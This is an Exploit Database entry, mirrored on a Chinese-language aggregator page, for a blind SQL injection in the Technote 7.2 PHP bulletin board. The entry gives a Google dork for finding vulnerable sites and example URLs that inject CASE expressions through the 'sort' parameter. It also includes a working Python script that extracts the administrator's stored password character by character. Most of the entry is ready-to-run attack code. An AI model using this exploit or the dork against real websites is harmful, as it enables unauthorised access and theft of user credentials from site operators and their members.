Technote 7.2 – Blind SQL Injection

• Exploit Database
• 119 阅读

• 作者： BlueH4G
  日期： 2011-06-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17389/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65

  # Exploit Title: technote blind sql injection # Google Dork: inurl:/technote7/board.php?board= # Date: 2011.06.11 # Author: BlueH4G (http://blueh4g.org) # Software Link: http://www.technote.co.kr/php/technote1/board.php?board=consult&command=skin_insert&exe=insert_down_shop # Version: technote7.2 > * && Mysql 3.x < * # Tested on: Windows & Linux everything   ============================================================================================================   vulnerability :   blind sql injection with order by option.   i could control align data with sort variable with <code>case</code>.     blueh4g.org/technote7/board.php?board=freeboard&sort=(case(select 1=1) when true then no else uid end) asc#   -> sort by <code>no</code> column.     blueh4g.org/technote7/board.php?board=freeboard&sort=(case(select 1=2) when true then no else uid end) asc#   -> sort by <code>uid</code> column.     ============================================================================================================   exploit :   #!/usr/bin/python #-*- coding: utf-8 -*- # coded by BlueH4G _http://blueh4g.org_ import urllib,re from time import sleep   def main() : chk = re.compile("true_title") url_begin=" http://t.blueh4g.org/technote7/board.php?board=freeboard&sort=(case%20(" url_end=")%20when%20true%20then%20no%20else%20uid%20end)%20asc%20limit%200,1%23" result="result : " for spos in range(1,14): ch=0 for i in range(1,8) : sleep(0.05)   query="select%20substr((select%20lpad(bin(ascii(substr(m_pass,"+str(spos)+",1))),7,0)%20from%20a_tn3_memberboard_list%20order%20by%20m_level%20desc%20limit%200,1),"+str(i)+",1)=1 data=urllib.urlopen(url_begin + query + url_end) text=data.read() if chk.search(text) : ch += 2**(7-i) result+=chr(ch) print result main()   ============================================================================================================   -- ## BlueH4G ##